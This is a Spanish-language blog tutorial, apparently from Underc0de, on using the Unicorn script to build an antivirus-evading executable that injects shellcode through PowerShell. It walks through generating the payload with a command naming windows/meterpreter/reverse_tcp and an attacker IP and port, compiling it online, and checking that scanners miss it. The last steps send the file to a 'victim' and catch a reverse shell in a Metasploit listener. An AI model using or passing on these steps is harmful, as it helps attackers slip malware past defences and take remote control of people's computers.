Evadiendo antivirus con Unicorn

“Powershell es la línea de comandos de Windows y aún mejor.”

 

¿Qué es POWERSHELL?, según Wikipedia:

Windows PowerShell es una interfaz de consola (CLI) con posibilidad de escritura y unión de comandos por medio de instrucciones (scripts en inglés). Es mucho más rica e interactiva que sus predecesores, desde DOS hasta Windows 7. Esta interfaz de consola está diseñada para su uso por parte de administradores de sistemas, con el propósito de automatizar tareas o realizarlas de forma más controlada. Originalmente denominada como MONAD en 2003, su nombre oficial cambió al actual cuando fue lanzada al público el 25 de abril del 2006.

downgrade en Powershell para inyectar un shellcode en memoria

Desde powershell podemos hacer todo lo que hacemos con el mouse y aún más cosas, permite crear tareas automatizadas.

Aquí veremos un script en particular codeado en Python.

El script se basa en la técnica llamada: “downgrade en Powershell para inyectar un shellcode en memoria

El script se llama Unicornio, básicamente genera un código en C que luego de compilarlo obtenemos un ejecutable (“win32” o “.exe”), actualmente es casi indetectable por los AntiVirus actuales.

  • Abrimos KALI y en Leafpad (Applications > Leafpad)
Underc0de - Eligiendo LefPad
  • Bajamos, copiamos y pegamos el siguiente script
  • Quedará algo así:
Underc0de - Código de Unicorn
  • Hacemos click en:
    • File -> Save As -> Name: “Unicornio.sh”
Underc0de - Guardando el unicornio
  • En una shell, lanzamos el archivo guardado:
    • ./Unicornio.sh windows/meterpreter/reverse_tcp 192.168.133.166 443 nonuac
      • “./Unicornio.sh” script a utilizar.
      • “windows/meterpreter/reverse_tcp” es el Payload a usar.
      • “192.168.133.166” es la dirección Ip de Kali.
      • “443” es el puerto a utilizar.
Underc0de - Ejecutando unicorn
  • Al finalizar, en la carpeta /root encontraremos un archivo “unicorn.c
Underc0de - archivo unicorn.c
  • Clic con el botón derecho del mouse “Open with Leafpad“, luego al abrirse hacemos clic en “edit” y “select all” para finalizar com “copy”.
  • Al copiar vamos a un compilador en-línea, borramos lo que hay y pegamos lo que acabamos de copiar para finaliza hacemos clic en compile:
Underc0de - Compilando en línea
  • Quedandonos:
Underc0de - Enlace al ejecutable

Descargamos el archivo y cambiamos el nombre.

  • Verificamos si es detectable, subiendo a sitios para que lo escaneen.

  • Para nuestra sorpresa, obtenemos:
Underc0de - resultado de escaners en línea
  • El archivo malicioso lo enviamos a la victima, antes en Kali tenemos que lanzar el “listener”:
    • Abrimos Metasploit “msfconsole” y ejecutamos los siguientes comandos:
Underc0de - Metasploit en modo listener
  • Cuando la victima ejecuta el archivo:
Underc0de - Obteniendo una reverse shell

 


Agradecemos a ANTRAX por brindarnos ésta Evasión de antivirus con Unicorn de Matías.


Posts Relacionados

Comments

comments

Deja una respuesta

Tu email no será publicado. Los campos requeridos estan marcados con *
Puedes usar tags HTML y los atributos: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">